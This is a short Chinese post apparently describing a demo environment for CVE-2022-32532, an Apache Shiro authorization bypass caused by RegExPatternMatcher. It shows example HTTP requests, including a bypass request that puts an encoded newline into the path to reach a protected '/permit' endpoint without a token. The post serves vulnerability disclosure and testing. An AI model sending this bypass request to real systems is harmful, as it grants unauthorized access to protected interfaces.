【CVE-2022-32532】Shiro漏洞测试环境
作者:Sec-Labs | 发布时间:
关于
这是一个演示项目,它只显示了利用这个漏洞(CVE-2022-32532)的其中一个条件。
事实上,有更多的方法可以利用它,只要开发者使用RegExPatternMatcher,就会有可能绕过漏洞。
国家安全漏洞库暂未收录该漏洞(2022-06-29 11点45分)
介绍
在当前配置下,需要进行令牌请求头验证,否则你没有权限访问/permit下的接口。
可以成功请求
GET /permit/any HTTP/1.1
Token: 4ra1n
当没有令牌请求头时,不允许访问
GET /permit/any HTTP/1.1
在特殊但常见的配置中,它可以以简单的方式被绕过
GET /permit/a%0any HTTP/1.1
项目地址
https://github.com/4ra1n/CVE-2022-32532
参考
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
该漏洞类似于Spring-Security CVE-2022-22978
标签:漏洞分享, POC脚本